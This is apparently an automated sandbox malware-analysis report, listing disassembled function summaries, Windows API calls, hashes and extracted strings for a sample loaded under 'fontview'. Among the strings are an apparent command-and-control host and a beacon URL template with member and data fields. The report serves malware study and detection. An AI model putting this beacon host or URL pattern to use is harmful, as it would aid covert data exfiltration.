                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$CloseCreateErrorHandleLastMappingView
                                                      • String ID: Local\jkhgjfgs3gGwsef
                                                      • API String ID: 1661045500-2024575643
                                                      • Opcode ID: 6bfd62d0656e9680acb0383248483cac1d890897ac2912ba9097326d9a3cc9c3
                                                      • Instruction ID: 510e1f7a28177a6c4adca6b9fa798e7cec5f3aa40cb69a399bd7e5cf68b8c7d0
                                                      • Opcode Fuzzy Hash: 6bfd62d0656e9680acb0383248483cac1d890897ac2912ba9097326d9a3cc9c3
                                                      • Instruction Fuzzy Hash: ADF0A9B1100632BBE7208B329C9CE873F68EF8A7B4F114210FA09DA1A0C730C442DAB0
                                                      APIs
                                                        • Part of subcall function 1001E1A7: closesocket.WS2_32(?), ref: 1001E1BD
                                                        • Part of subcall function 1001E1A7: closesocket.WS2_32(?), ref: 1001E1C8
                                                        • Part of subcall function 1001E1A7: closesocket.WS2_32(?), ref: 1001E1D4
                                                        • Part of subcall function 1001E1A7: Sleep.KERNELBASE(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E1EE
                                                        • Part of subcall function 1001E1A7: TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E1F5
                                                        • Part of subcall function 1001E1A7: CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E1FA
                                                        • Part of subcall function 1001E1A7: Sleep.KERNEL32(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E20C
                                                        • Part of subcall function 1001E1A7: TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E213
                                                        • Part of subcall function 1001E1A7: CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E218
                                                        • Part of subcall function 1001E1A7: Sleep.KERNEL32(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E22A
                                                        • Part of subcall function 1001E1A7: TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E231
                                                        • Part of subcall function 1001E1A7: CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E236
                                                        • Part of subcall function 1001E1A7: Sleep.KERNEL32(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E248
                                                        • Part of subcall function 1001E1A7: TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E24F
                                                        • Part of subcall function 1001E1A7: CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E254
                                                        • Part of subcall function 1001E1A7: Sleep.KERNELBASE ref: 1001E26F
                                                      • TerminateThread.KERNELBASE(00000234,00000000), ref: 100074FB
                                                      • CloseHandle.KERNEL32(00000234), ref: 10007507
                                                      • TerminateThread.KERNELBASE(00000218,00000000), ref: 10007516
                                                      • CloseHandle.KERNEL32(00000218), ref: 10007522
                                                      • CloseHandle.KERNEL32(00000274), ref: 1000752F
                                                        • Part of subcall function 1000BDB5: __EH_prolog.LIBCMT ref: 1000BDBA
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle$TerminateThread$Sleep$closesocket$H_prolog
                                                      • String ID:
                                                      • API String ID: 3433561863-0
                                                      • Opcode ID: eb0ec70e1847ada11725b6de51eb09c42151a348a7c83084cfd6c567b3cd2be1
                                                      • Instruction ID: 825a54de0ef117b15b095b619e3c21a0ce1a9e7865436b8144138b74cdb72a88
                                                      • Opcode Fuzzy Hash: eb0ec70e1847ada11725b6de51eb09c42151a348a7c83084cfd6c567b3cd2be1
                                                      • Instruction Fuzzy Hash: 72110A75200B508BE728DF35CC48AA6B7E5EF44385F01482DE19F97165DB78F945CB10
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 10002371
                                                        • Part of subcall function 1001BC82: __EH_prolog.LIBCMT ref: 1001BC87
                                                        • Part of subcall function 1001BC82: LocalAlloc.KERNEL32(00000040,00000000,1005ADE8,1005AF8C,1005ADE8,00000000,10168660,00000000,00000000), ref: 1001BCE2
                                                        • Part of subcall function 1001BC82: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000008,00000000,00000000), ref: 1001BD03
                                                        • Part of subcall function 1001BC82: LocalFree.KERNEL32(00000000,00000000,00000000,?,000000FF,00000000,00000008,00000000,00000000), ref: 1001BD1A
                                                      • _sprintf.LIBCMT ref: 100023F4
                                                      Strings
                                                      • /index.php/inface/Indexnew?d=%s&member_id=%s&stamptime=%d&data=%s, xrefs: 100023EE
                                                      • api.5566331.com, xrefs: 10002430
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prologLocal$AllocByteCharFreeMultiWide_sprintf
                                                      • String ID: /index.php/inface/Indexnew?d=%s&member_id=%s&stamptime=%d&data=%s$api.5566331.com
                                                      • API String ID: 1886346375-2983348053
                                                      • Opcode ID: 58c1d8fbe5a03cb1d147068550ba185dd112fd127cca21f8f0551514cb59fe1a
                                                      • Instruction ID: ac0105269a1a7c84a4e52344445157f79487e8b33dc675cb9405ff6c2244ed2b
                                                      • Opcode Fuzzy Hash: 58c1d8fbe5a03cb1d147068550ba185dd112fd127cca21f8f0551514cb59fe1a
                                                      • Instruction Fuzzy Hash: 89218175900148ABEB14DFA4CC55EDEB778EF14384F404469F406A7182EB70AE44CBE1
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 10017B2B
                                                        • Part of subcall function 10018235: __EH_prolog.LIBCMT ref: 1001823A
                                                        • Part of subcall function 10018235: std::locale::_Init.LIBCPMT ref: 100182C4
                                                        • Part of subcall function 10017D97: __EH_prolog.LIBCMT ref: 10017D9C
                                                        • Part of subcall function 10017A82: __EH_prolog.LIBCMT ref: 10017A87
                                                        • Part of subcall function 10017A82: _wprintf.LIBCMT ref: 10017AB4
                                                        • Part of subcall function 1001A313: _wprintf.LIBCMT ref: 1001A334
                                                        • Part of subcall function 1001A313: send.WS2_32(?,00000000,?,00000000), ref: 1001A34E
                                                        • Part of subcall function 1001A313: WSAGetLastError.WS2_32(?,?,10017BAA,?,1005AEE0,00000000,Content-Length), ref: 1001A35B
                                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 10017BC6
                                                        • Part of subcall function 1003293B: std::ios_base::_Tidy.LIBCPMT ref: 1003295B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog$_wprintfstd::ios_base::_$ErrorInitIos_base_dtorLastTidysendstd::locale::_
                                                      • String ID: Content-Length$inc\http\HttpConnection.cpp
                                                      • API String ID: 918007117-3146130545
                                                      • Opcode ID: 40ef1619abf4a142944efc019406029fe1174e287281a86041d6dda7aacc45ce
                                                      • Instruction ID: 75a4cd840f36df8d2ac12fee9985095fe0ae56a02b47657bfe69f213c4d39a4c
                                                      • Opcode Fuzzy Hash: 40ef1619abf4a142944efc019406029fe1174e287281a86041d6dda7aacc45ce
                                                      • Instruction Fuzzy Hash: A8110636900204ABD715E768CD13BEEB7B8EF41350F10015EF105AB192DB306F88C792
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 1001A1E6
                                                      • recv.WS2_32(?,?,00400000,00000000), ref: 1001A215
                                                      • WSAGetLastError.WS2_32 ref: 1001A21F
                                                      • recv.WS2_32(?,?,00400000,00000000), ref: 1001A2F7
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: recv$ErrorH_prologLast
                                                      • String ID:
                                                      • API String ID: 1189367603-0
                                                      • Opcode ID: 5e304acbd74c9f060009b39717d57cf9600db593700376564ddc8e3238e0392b
                                                      • Instruction ID: b4c2601fb093304271381bf4d6a57f627c918c8f1ebe356989ccf57b4cacec91
                                                      • Opcode Fuzzy Hash: 5e304acbd74c9f060009b39717d57cf9600db593700376564ddc8e3238e0392b
                                                      • Instruction Fuzzy Hash: 22314871900659EFDB10CBE8CC81BEEBBF8FF19354F10452AE416A7191DB74AA45CB60
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 1001C131
                                                      • __mbsinc.LIBCMT ref: 1001C177
                                                      • PathIsDirectoryA.SHLWAPI(?), ref: 1001C1B5
                                                      • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,?,00000000,?,?,1000E095,?,1005C6FC,?,?,?), ref: 1001C1D0
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Directory$CreateH_prologPath__mbsinc
                                                      • String ID:
                                                      • API String ID: 3676323035-0
                                                      • Opcode ID: 035b1e21f1d2bbd3d14b555b90e1b5be1c2c80bfd006bb547435f7c0cc31543b
                                                      • Instruction ID: 39af0d0c7e0004fa6f05bf9c636e80e62591e6cbe11adbc1e24eaa1d211b549f
                                                      • Opcode Fuzzy Hash: 035b1e21f1d2bbd3d14b555b90e1b5be1c2c80bfd006bb547435f7c0cc31543b
                                                      • Instruction Fuzzy Hash: 2F310836940549BFEB11CB68C890FDEBBA8EF42394F154169E4456B1C2DF70EE88CB90
                                                      APIs
                                                        • Part of subcall function 1001136C: CoCreateGuid.OLE32(?), ref: 1001138D
                                                        • Part of subcall function 1001136C: _fprintf.LIBCMT ref: 100113A5
                                                      • _malloc.LIBCMT ref: 1000DAD5
                                                        • Part of subcall function 100339BC: __FF_MSGBANNER.LIBCMT ref: 100339D3
                                                        • Part of subcall function 100339BC: __NMSG_WRITE.LIBCMT ref: 100339DA
                                                        • Part of subcall function 100339BC: RtlAllocateHeap.NTDLL(00B70000,00000000,00000001,00000000,?,00000000,?,10039271,00000000,00000000,00000000,?,?,10037A2F,00000018,1005F658), ref: 100339FF
                                                      • _malloc.LIBCMT ref: 1000DAEF
                                                      • _malloc.LIBCMT ref: 1000DB04
                                                      • _malloc.LIBCMT ref: 1000DB1D
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _malloc$AllocateCreateGuidHeap_fprintf
                                                      • String ID:
                                                      • API String ID: 995246934-0
                                                      • Opcode ID: bb442244e72e22da4d7f3cb7c7dc31e939c401801904e2133fa1fff62a849eae
                                                      • Instruction ID: 0c794dbf93a883c59379ebb3549ba63955cc03bc23cb9c033a601534a3face92
                                                      • Opcode Fuzzy Hash: bb442244e72e22da4d7f3cb7c7dc31e939c401801904e2133fa1fff62a849eae
                                                      • Instruction Fuzzy Hash: 7231AFB4901B00DED361EF2A9584787FBE8EFA4390F11491FE4AA96661DBB4B540CF60
                                                      APIs
                                                      • socket.WS2_32(00000002,00000002,00000011), ref: 1001DF7C
                                                      • WSAGetLastError.WS2_32(?,1001E0B2), ref: 1001DF89
                                                      • setsockopt.WS2_32(00000000,0000FFFF,00001005,?,00000004), ref: 1001DFAB
                                                      • setsockopt.WS2_32(?,0000FFFF,00001006,000003E8,00000004), ref: 1001DFBF
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: setsockopt$ErrorLastsocket
                                                      • String ID:
                                                      • API String ID: 1825786771-0
                                                      • Opcode ID: 1a59164a0e9f48adf7641a0f3a4528e9988e322c87277efcff72568403c9b408
                                                      • Instruction ID: b2fa6c4f3e2365603d35b98d26ebd87122be398151743637c1c9ce2e762f7076
                                                      • Opcode Fuzzy Hash: 1a59164a0e9f48adf7641a0f3a4528e9988e322c87277efcff72568403c9b408
                                                      • Instruction Fuzzy Hash: 9BF06DB154421ABFF710AB64CC8AF99BB6CDB08765F204325F312960E0DBF09E409621
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 1001198D
                                                      • __time64.LIBCMT ref: 100119AE
                                                        • Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
                                                        • Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439
                                                        • Part of subcall function 10011419: __EH_prolog.LIBCMT ref: 1001141E
                                                        • Part of subcall function 10011C4E: __EH_prolog.LIBCMT ref: 10011C53
                                                        • Part of subcall function 1001BE7E: __EH_prolog.LIBCMT ref: 1001BE83
                                                        • Part of subcall function 1001BE7E: _sprintf.LIBCMT ref: 1001BEF8
                                                        • Part of subcall function 10003925: _memmove.LIBCMT ref: 10003950
                                                        • Part of subcall function 100036AE: _memmove.LIBCMT ref: 10003704
                                                        • Part of subcall function 1001BF99: __EH_prolog.LIBCMT ref: 1001BF9E
                                                        • Part of subcall function 1001B9CF: __EH_prolog.LIBCMT ref: 1001B9D4
                                                        • Part of subcall function 1001B9CF: LocalAlloc.KERNEL32(00000040,?,1005D658,?,00000000,00000000,?,00000000,00000000), ref: 1001BA16
                                                        • Part of subcall function 1001B9CF: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?,?,00000000,00000000), ref: 1001BA35
                                                        • Part of subcall function 1001B9CF: char_traits.LIBCPMT ref: 1001BA3C
                                                        • Part of subcall function 1001B9CF: LocalFree.KERNEL32(00000000,00000000,00000000,?,000000FF,00000000,?,?,00000000,00000000), ref: 1001BA4C
                                                        • Part of subcall function 1000236C: __EH_prolog.LIBCMT ref: 10002371
                                                        • Part of subcall function 1000236C: _sprintf.LIBCMT ref: 100023F4
                                                      • CreateThread.KERNEL32(00000000,00000000,1000D4AD,?,00000000,00000000), ref: 10011BBE
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog$LocalTime_memmove_sprintf$AllocByteCharCreateFileFreeMultiSystemThreadWide__aulldiv__time64char_traits
                                                      • String ID:
                                                      • API String ID: 2736727069-0
                                                      • Opcode ID: a164dce375776bab9a8840abe26e894697faddf913288d20eac01ec7679d546f
                                                      • Instruction ID: 580e3e4189418ba42efff9c301c6a522281fecc5959f66fff071016f5e044300
                                                      • Opcode Fuzzy Hash: a164dce375776bab9a8840abe26e894697faddf913288d20eac01ec7679d546f
                                                      • Instruction Fuzzy Hash: B2718434900258EEEB14DBA4CD95BEDB7B8EF14340F50459AE40A77186EB706F89CFA1
                                                      APIs
                                                        • Part of subcall function 10025E20: GetNativeSystemInfo.KERNELBASE(?,B7A91B76,?,?,?,10050CCE,000000FF,?,1001EB0B,B7A91B76), ref: 10025E61
                                                        • Part of subcall function 10025E20: GetNativeSystemInfo.KERNEL32(?,?,?,?,10050CCE,000000FF,?,1001EB0B,B7A91B76), ref: 10025E7C
                                                      • GetNativeSystemInfo.KERNEL32(?,B7A91B76,0000000F), ref: 1001EB35
                                                      • HeapCreate.KERNELBASE(00000000,00000000,00000000), ref: 1001EBD0
                                                      • _free.LIBCMT ref: 1001EC31
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InfoNativeSystem$CreateHeap_free
                                                      • String ID:
                                                      • API String ID: 3771285432-0
                                                      • Opcode ID: 1e23d421bf4e264bfc0fb7f400e109bcfeb3f31abeb715072edda35998fe9cf1
                                                      • Instruction ID: 084453f00552fd9cdcf573a0b57787ee67f97c677d196269d3afbad7c3934e3d
                                                      • Opcode Fuzzy Hash: 1e23d421bf4e264bfc0fb7f400e109bcfeb3f31abeb715072edda35998fe9cf1
                                                      • Instruction Fuzzy Hash: 7951B4B0814B40DFE761CF25C948787BBE4FB09308F504A1DD8AA8BB90D7B9A548CF85
                                                      APIs
                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 10005734
                                                      • ReleaseMutex.KERNEL32(?,?,?,?,?), ref: 100057EF
                                                      • Sleep.KERNELBASE(00000001), ref: 10005810
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MutexObjectReleaseSingleSleepWait
                                                      • String ID:
                                                      • API String ID: 2685543577-0
                                                      • Opcode ID: df1283a9f5abd3997303220ddb6a8fcc7d2dc6e6c10f47cb207e2c6f176f9dd1
                                                      • Instruction ID: e715972c45bbafa45bd51ed1e775cbe0a086c7abb003f9553e746b27f7d06d24
                                                      • Opcode Fuzzy Hash: df1283a9f5abd3997303220ddb6a8fcc7d2dc6e6c10f47cb207e2c6f176f9dd1
                                                      • Instruction Fuzzy Hash: 2231B535604B41DFEB24DF24C885A5BB7E4FF44391F108A2DE9AE972A5DB31A900CB52
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_10000000_fontview.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: gethostbynamegethostnameinet_ntoa
                                                      • String ID:
                                                      • API String ID: 289322838-0
                                                      • Opcode ID: 9ebd9e9a71669bdd643d1d02bb31ae1036113e812a7643cec50d709a30c8e0a0
                                                      • Instruction ID: 592dd81a24b4693bc26b9f645d6de9898b1e2dcdf9a12e457dba177d0956e45d
                                                      • Opcode Fuzzy Hash: 9ebd9e9a71669bdd643d1d02bb31ae1036113e812a7643cec50d709a30c8e0a0
                                                      • Instruction Fuzzy Hash: B901A4355001297BEB11DB64CC49EEE73EDEF49360F0441A5F905C7194EBB4EE858A60
                                                      APIs
                                                        • Part of subcall function 1000E186: __EH_prolog.LIBCMT ref: 1000E18B
                                                        • Part of subcall function 1000E186: __time64.LIBCMT ref: 1000E1B1
                                                        • Part of subcall function 1000E186: _rand.LIBCMT ref: 1000E1BE
                                                        • Part of subcall function 1000E186: __time64.LIBCMT ref: 1000E1C7
                                                        • Part of subcall function 1000E186: _sprintf.LIBCMT ref: 1000E228
                                                      • TerminateThread.KERNEL32(?,00000000,75920F10,00000001,?,100060CA,00000000,?), ref: 10007627
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000030,?,00000000,00000030), ref: 10007630
                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_0001D6D7,?,00000000,00000000), ref: 10007643
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
